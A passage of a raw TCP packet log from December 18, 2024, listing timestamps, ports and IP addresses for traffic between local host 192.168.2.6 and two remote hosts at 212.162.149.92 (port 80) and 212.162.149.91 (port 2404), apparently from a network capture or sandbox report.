                                                            Dec 18, 2024 11:05:14.647910118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.649688005 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.649710894 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.649725914 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.651504993 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.651545048 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.651596069 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.651684046 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.653332949 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.653446913 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.653470993 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.655210018 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.655235052 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.655292034 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.655323029 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.656374931 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.657066107 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.657118082 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.657315969 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.659056902 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.659181118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.659420967 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.660825014 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.660924911 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.660957098 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.662620068 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.662851095 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.662879944 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.663374901 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.664473057 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.664570093 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.666348934 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.666452885 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.666480064 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.667591095 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.668276072 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.668373108 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.668478966 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.670073986 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.670171022 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.670186996 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.670245886 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.671900988 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.671962976 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.672019005 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.672074080 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.673850060 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.673921108 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.673971891 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.674031019 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.675662994 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.675724983 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.675753117 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.675806999 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.677495003 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.677557945 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.677572012 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.677625895 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.679343939 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.679411888 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.679476023 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.679697990 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.681214094 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.681260109 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.681292057 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.681322098 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.683064938 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.683187962 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.683211088 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.683249950 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.685097933 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.685214996 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.685230970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.685318947 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.686764002 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.686834097 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.686836958 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.686892986 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.688947916 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.689002037 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.689018011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.689055920 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.690565109 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.690675974 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.690794945 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.691109896 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.692301989 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.692362070 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.692434072 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.692513943 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.694339991 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.694401979 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.694417953 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.694474936 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.696285009 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.696351051 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.696361065 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.696412086 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.697882891 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.697953939 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.698009968 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.698064089 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.699937105 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.699989080 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.700001955 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.700073957 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.701612949 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.701704979 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.701755047 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.701809883 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.703479052 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.703555107 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.703613043 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.703669071 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.705322027 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.705395937 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.705440044 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.705524921 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.707250118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.707333088 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.707389116 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.707441092 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.709029913 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.709120989 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.709140062 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.709196091 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.710892916 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.710973024 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.711009026 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.711066961 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.712702036 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.712796926 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.712812901 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.712867975 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.714576960 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.714679956 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.714683056 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.714931011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.716438055 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.716533899 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.716572046 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.716626883 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.718327999 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.718400002 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.718432903 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.718488932 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.720339060 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.720360041 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.720484018 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.722012043 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.722079039 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.722167015 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.722223997 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.723869085 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.723937988 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.724060059 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.724123001 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.725873947 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.725888014 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.725976944 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.727596045 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.727689981 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.727735043 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.727799892 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.729487896 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.729583979 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.729598999 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.729939938 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.731412888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.731488943 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.731513023 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.731723070 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.733319998 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.733374119 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.733395100 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.733433008 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.735121965 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.735184908 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.735358000 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.736907005 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.736974001 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.737066031 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.737127066 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.739253998 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.739322901 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.739516020 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.739581108 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.741275072 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.741331100 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.741336107 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.741449118 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.742984056 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.743040085 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.743057013 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.743123055 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.744561911 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.744628906 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.744661093 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.744716883 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.746499062 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.746534109 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.746562004 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.746592045 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.748045921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.748132944 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.748138905 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.748198032 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.749880075 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.749933004 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.750139952 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.751741886 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.751873970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.751883030 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.751935005 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.753647089 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.753710032 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.753765106 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.753854036 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.755685091 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.755783081 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.755804062 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.755867958 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.757373095 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.757406950 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.757437944 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.757468939 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.759169102 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.759237051 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.759277105 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.759357929 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.761090040 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.761145115 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.761159897 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.761234045 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.762887955 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.762964010 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.763019085 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.763086081 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.764853001 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.764889002 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.764919043 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.765072107 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.766588926 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.766669989 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.766726971 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.766788006 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.768485069 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.768538952 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.768564939 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.768642902 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.770358086 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.770412922 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.770423889 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.770498991 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.772159100 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.772213936 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.772238970 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.772280931 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.774044037 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.774108887 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.774111986 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.774167061 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.775861979 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.775929928 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.776000977 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.776062012 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.777842045 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.777916908 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.777965069 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.778177977 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.779551029 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.779630899 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.779695034 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.779763937 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.781407118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.781572104 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.781634092 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.781712055 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.783284903 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.783375025 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.783422947 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.783551931 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.785151005 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.785244942 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.785252094 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.785306931 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.786995888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.787203074 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.787240028 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.787282944 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.788852930 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.788949966 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.789037943 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.789098978 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.790712118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.790800095 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.790852070 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.790920019 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.792671919 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.792769909 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.792814970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.792876959 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.794339895 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.794444084 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.794478893 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.794540882 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.796159029 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.796247959 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.796298981 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.796531916 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.797791958 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.797873974 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.797902107 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.797959089 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.799415112 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.799493074 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.799534082 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.799593925 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.801040888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.801136971 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.801173925 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.801234007 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.802745104 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.802828074 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.802901030 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.803781986 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:15.175010920 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:15.294697046 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:15.294816971 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:15.300199032 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:15.419816971 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.441387892 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.487668037 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:16.677369118 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.681329966 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:16.801006079 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.801426888 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:16.921192884 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.146975994 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.148647070 CET498742404192.168.2.6212.162.149.91
